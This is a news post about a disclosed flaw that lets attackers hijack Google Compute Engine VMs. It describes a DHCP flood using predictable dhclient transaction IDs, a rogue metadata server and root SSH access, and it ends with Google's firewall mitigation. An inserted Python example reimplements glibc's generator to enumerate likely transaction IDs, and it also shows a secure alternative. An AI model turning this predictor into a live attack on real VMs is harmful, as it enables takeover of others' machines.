Google Cloud VMs vulnerable to hijack

An attacker could gain root access to VMs running on Google Cloud

Cybersecurity researcher Imre Rad has disclosed a vulnerability that can be exploited to gain root access to virtual machines (VMs) running on Google Cloud.

Specifically, the attack targets Google Compute Engine (GCE), Google Cloud's Infrastructure-as-a-Service (IaaS) product.

Rad explains that attackers can take over GCE VMs by exploiting a weakness in the random number generator of the ISC DHCP client (dhclient) that GCE guest images run by default, combined with an unfortunate set of additional factors.

The hijack works by impersonating the metadata server from the targeted virtual machine's point of view. With that position, the attacker can grant themselves SSH access (public key authentication) and then log in as root.

In his writeup, Rad explains that the attack consists of two phases. The first involves flooding the victim VM with DHCP packets so that, thanks to the predictable transaction IDs the weak generator produces, one of them is accepted and the VM is pointed at a malicious, attacker-controlled metadata server instead of the official Google one.

Once the victim's VM is fetching its configuration from the rogue metadata server, the attacker can serve their own SSH public key from it and gain root access to the VM.
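The following is an added example, not code from the article or from Rad's writeup, that models the first phase described above: why a DHCP client whose transaction ID (xid) comes from a PRNG seeded with guessable values can be covered by a flood of forged replies. It assumes the seed scheme used in ISC dhclient's client.c (the last four hardware-address bytes read as a native int, plus the current time, plus the pid) and glibc's random() generator; the GCE MAC layout (42:01 followed by the four octets of the internal IP), the boot time, the pid and the IP address are constructed assumptions for the demonstration and should be checked against the dhclient source and guest image you actually run.

```python
from __future__ import annotations

import ipaddress
import os


def _c_div(a: int, b: int) -> int:
    """C-style integer division (truncates toward zero, unlike Python's //)."""
    q = abs(a) // abs(b)
    return q if (a < 0) == (b < 0) else -q


def _int32(x: int) -> int:
    """Reinterpret an unsigned 32-bit value as a signed int32, as C does."""
    x &= 0xFFFFFFFF
    return x - (1 << 32) if x & 0x80000000 else x


def glibc_random(seed: int, count: int) -> list:
    """First `count` outputs of glibc random() after srandom(seed) (TYPE_3 generator)."""
    seed &= 0xFFFFFFFF
    if seed == 0:
        seed = 1                      # glibc refuses a zero seed
    r = [_int32(seed)]
    word = r[0]
    for _ in range(1, 31):            # 16807 * x mod (2^31 - 1), Schrage's method
        hi = _c_div(word, 127773)
        lo = word - hi * 127773
        word = 16807 * lo - 2836 * hi
        if word < 0:
            word += 2147483647
        r.append(word)
    for i in range(31, 34):
        r.append(r[i - 31])
    for i in range(34, 344):          # glibc discards the first 310 feedback outputs
        r.append((r[i - 3] + r[i - 31]) & 0xFFFFFFFF)
    out = []
    for i in range(344, 344 + count):
        r.append((r[i - 3] + r[i - 31]) & 0xFFFFFFFF)
        out.append(r[i] >> 1)         # low bit is dropped, so outputs are 31-bit
    return out


def gce_mac(internal_ip: str) -> bytes:
    """Assumed GCE scheme: MAC is 42:01 followed by the four internal-IP octets."""
    return b"\x42\x01" + ipaddress.IPv4Address(internal_ip).packed


def dhclient_seed(mac: bytes, now: int, pid: int) -> int:
    """srandom() argument as dhclient builds it (assumption, see lead-in): last four
    MAC bytes as a native little-endian int, plus time, plus pid, truncated to 32 bits."""
    junk = int.from_bytes(mac[-4:], "little", signed=True)
    return (junk + now + pid) & 0xFFFFFFFF


def dhclient_xid(mac: bytes, now: int, pid: int) -> int:
    """The first random() output becomes the xid of the first DHCPDISCOVER."""
    return glibc_random(dhclient_seed(mac, now, pid), 1)[0]


def secure_xid() -> int:
    """Hardened alternative: a 32-bit transaction ID from the OS CSPRNG."""
    return int.from_bytes(os.urandom(4), "big")


def candidate_xids(mac: bytes, times: range, pids: range) -> set:
    """Every xid a client with this MAC could have chosen if it started within
    `times` with a pid in `pids`: the set a flood of forged replies must cover."""
    return {dhclient_xid(mac, t, p) for t in times for p in pids}


def demo() -> dict:
    mac = gce_mac("10.128.0.2")                       # constructed victim
    approx_boot = 1_625_140_800                       # constructed: attacker's boot-time estimate
    victim_xid = dhclient_xid(mac, approx_boot + 41, 437)   # true time/pid, unknown to attacker
    cands = candidate_xids(mac, range(approx_boot, approx_boot + 60), range(400, 500))
    return {
        "predictable_xid_covered": victim_xid in cands,    # True: a 6,000-packet flood suffices
        "candidates": len(cands),
        "fraction_of_32bit_space": len(cands) / 2**32,
        "secure_xid_covered": secure_xid() in cands,       # False except with negligible chance
    }


if __name__ == "__main__":
    print(demo())
```

The MAC is fixed by the internal IP, the boot time is bounded to a window the attacker can estimate, and the pid at first boot falls in a narrow range, so the xid search space collapses from 2^32 to a few thousand values that a flood can enumerate; drawing the xid from `os.urandom` instead leaves the attacker guessing across the whole space.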

Rad says his technique is inspired by an attack vector shared earlier by Chris Moberly, another security researcher.

He reported the vulnerability to Google in September 2020 but has not heard back since. He suspects that, since Google has not closed his bug report, some technical complexity is preventing them from deploying a network-level remediation.

Update:

Google now says it has taken steps to prevent exploitation of the vulnerability from the internet or via a VM's external IP address, although a complete mitigation has not yet been deployed.

According to Google, customers whose internal (VPC) traffic is not fully trusted should make sure that inbound UDP port 68, the DHCP client port, is blocked by firewall rules to head off malicious activity. Such a rule does not break legitimate leases: on GCE the DHCP service is provided by the metadata server at 169.254.169.254, and traffic to and from that address is always allowed regardless of VPC firewall rules, so only DHCP replies arriving from other sources are dropped.

Posted by rex_mundi
Source : Unknown
Thursday 01 July 2021